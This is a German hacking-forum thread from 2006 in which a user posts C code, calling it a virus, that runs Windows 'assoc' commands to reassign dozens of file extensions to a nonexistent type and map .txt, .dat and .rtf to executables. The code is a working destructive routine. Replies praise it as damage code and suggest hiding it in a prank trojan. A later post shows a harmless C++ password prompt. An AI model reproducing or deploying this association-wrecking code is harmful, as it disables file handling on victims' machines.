Register for your free account! | Forgot your password?

You last visited: Today at 03:06

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Virus

Discussion on Virus within the Technical Support forum part of the Off-Topics category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Sind da irgendwelche Fehler :P
Code:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
system("assoc .exe=Error");
system("assoc .png=Error");
system("assoc .gif=Error");
system("assoc .jpg=Error");
system("assoc .jpeg=Error");
system("assoc .bmp=Error");
system("assoc .txt=exefile");
system("assoc .ini=Error");
system("assoc .ttf=Error");
system("assoc .log=Error");
system("assoc .xml=Error");
system("assoc .html=Error");
system("assoc .htm=Error");
system("assoc .php=Error");
system("assoc .php3=Error");
system("assoc .php4=Error");
system("assoc .bat=Error");
system("assoc .pif=Error");
system("assoc .cmd=Error");
system("assoc .chm=Error");
system("assoc .lnk=Error");
system("assoc .frm=Error");
system("assoc .map=Error");
system("assoc .ut=Error");
system("assoc .ut2=Error");
system("assoc .wav=Error");
system("assoc .wave=Error");
system("assoc .mp3=Error");
system("assoc .ogg=Error");
system("assoc .c=Error");
system("assoc .o=Error");
system("assoc .cpp=Error");
system("assoc .dll=Error");
system("assoc .dat=exefile");
system("assoc .tmp=Error");
system("assoc .zip=Error");
system("assoc .rar=Error");
system("assoc .wmv=Error");
system("assoc .wma=Error");
system("assoc .wmi=Error");
system("assoc .cab=Error");
system("assoc .tar=Error");
system("assoc .gz=Error");
system("assoc .bz2=Error");
system("assoc .rtf=exefile");
system("assoc .doc=Error");
system("assoc .bak=Error");
system("assoc .avi=Error");
system("assoc .divx=Error");
system("assoc .mpg=Error");
system("assoc .mpeg=Error");
system("assoc .3gp=Error");
system("assoc .iso=Error");
system("assoc .ccd=Error");
system("assoc .img=Error");
system("assoc .set=Error");
system("assoc .b=Error");
system("assoc .wpl=Error");
system("assoc .itl=Error");
system("assoc .vbs=Error");
system("assoc .win=Error");


 return 0;
}
BastardZeroFromHell is offline  
Old 04/20/2006, 03:22   #2
 
elite*gold: 0
Join Date: May 2005
Posts: 4,620
Received Thanks: 104
Nicht gerade Fatal, aber lustig für zwischendurch
Maybe It's Maybelline is offline  
Old 04/20/2006, 03:35   #3
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Ja^^
Mir war langweilig
BastardZeroFromHell is offline  
Old 04/20/2006, 12:08   #4
 
elite*gold: 0
Join Date: Oct 2005
Posts: 2,487
Received Thanks: 215
Yei den versteh ich sogar (glaub ich), ohne das ich eine einzige Sprache kann *stolz*
Also so gut wie alle Dateien werden mit einem Error behaftet?
Term!nX is offline  
Old 04/20/2006, 14:04   #5
 
elite*gold: 0
Join Date: May 2005
Posts: 4,620
Received Thanks: 104
Quote:
Originally posted by Term!nX@Apr 20 2006, 12:08
Yei den versteh ich sogar (glaub ich), ohne das ich eine einzige Sprache kann *stolz*
Also so gut wie alle Dateien werden mit einem Error behaftet?
So ähnlich, der Suffix wird einfach assoziiert, die Dateien werden nicht überschrieben oder ähnliches.
Maybe It's Maybelline is offline  
Old 04/20/2006, 15:39   #6
 
mr.rattlz's Avatar
 
elite*gold: 0
Join Date: Aug 2005
Posts: 896
Received Thanks: 334
schöne Schadroutine, aber es mangelt dem code an viralem verhalten :P
mr.rattlz is offline  
Old 04/21/2006, 22:34   #7
 
elite*gold: 0
Join Date: Mar 2006
Posts: 1,376
Received Thanks: 29
Das könntest in so ne Art Funtrojaner einbauen.
obsceneArts is offline  
Old 04/22/2006, 00:16   #8
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Ja davon habe ich nicht soviel Ahnung
Habe einfach mal rummprobiert und siehe da,er funzt^^
BastardZeroFromHell is offline  
Old 04/22/2006, 00:47   #9
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Meine neuste Kreation in C++
Passwort ist E*PVP
Attached Files
File Type: ibf post-35-1145659647.ibf (101.3 KB, 3 views)
BastardZeroFromHell is offline  
Old 04/22/2006, 10:47   #10
 
spelaben's Avatar
 
elite*gold: 0
Join Date: Oct 2005
Posts: 805
Received Thanks: 44
lol, das wird sich sicher niemand so schnell ziehen
spelaben is offline  
Old 04/23/2006, 15:40   #11
 
elite*gold: 0
Join Date: May 2005
Posts: 4,620
Received Thanks: 104
Immer wieder interessant wieviel man rausfinden kann über eine exe nur allein im plaintext.
Maybe It's Maybelline is offline  
Old 04/23/2006, 21:11   #12
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Das ist eine Passwort-Abfrage^^
Kein Virus
BastardZeroFromHell is offline  
Old 04/23/2006, 21:19   #13
 
elite*gold: 0
Join Date: May 2005
Posts: 4,620
Received Thanks: 104
Quote:
Originally posted by BastardZeroFromHell@Apr 23 2006, 21:11
Das ist eine Passwort-Abfrage^^
Kein Virus
Achja?
Entweder bist du ein sehr schlechter coder oder da sind Sachen drinn, die normalerweise nicht rein sollen =P

Ich meine ok, da ist wirklich eine Passwort Abfrage drinn, allerdings verstehe ich den umliegenden -massigen code- nicht XD
Maybe It's Maybelline is offline  
Old 04/23/2006, 22:28   #14
 
elite*gold: 0
Join Date: Apr 2006
Posts: 157
Received Thanks: 0
Phhhh....
Ich befasse mich mehr mim Virus-coding :P
Das ist viel :P?
Code:
#include <iostream>
#include <string.h>

using namespace std;

int main()
{
    int i,length=9;
    char pw[9]="E*PVP", passwort[9];


        for(i=3;i>0;i--)
        {
            cout<<"\n\tSie haben noch "<<i<<" Versuche!";
            cout<<"\n\tBitte geb dein 'Passwort' ein: ";
            cin.getline(passwort,length);

            if(strcmp(passwort, pw) == 0)
            {
                cout<<"\n\tAccess Granted!"<<endl;
                cout<<"\tSie wurden erfolgreich eingeloggt!"<<endl<<endl;
                cin.ignore();
            }
            else
            {
                cout<<"\n\tAccess Denied!"<<endl<<endl;
            }
        }
    if(i==0)
    {
        cout<<"\n\tIhre Karte wird nun eingezogen!";
        cout<<"\n\tBitte wenden sie sich an den Administrator!"<<endl<<endl;
    }
}
BastardZeroFromHell is offline  
Reply


Similar Threads Similar Threads
Virus oder kein Virus?
08/24/2010 - Main - 3 Replies
Liebe Com Ich wollte mal Fragen ob diese Datei ein Virus / Keylogger etc enthaltet? Link: MEGAUPLOAD - The leading online storage and file delivery service Dankeschön
neuer virus im WR ordner oder eigener Virus?
06/14/2010 - WarRock - 8 Replies
hallo ich habe gerade Warrock gestartet dann meldete sich Kaspersky was es bishe rnoch nie machte und da stant das Warrock ein Virus hat oder ist namens PDS(oder so ähnlich) Keylogger.??? also ihrgend wie so. Hat Warrock jetzt wieder ein Problem mit nem Virus update was die Antivir programme erkennt oder habe ich mir mal was gedownloadet was als Virus angezeigt wird? Vieleicht sagt auch jemand was dazu der Kaspersky hat ;) Insgesammt hat er 5 Trojanische Programme gefunden meint er...
P-Server Virus oder kein Virus?
01/03/2009 - Metin2 Private Server - 2 Replies
Pls helft mir



All times are GMT +1. The time now is 03:07.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.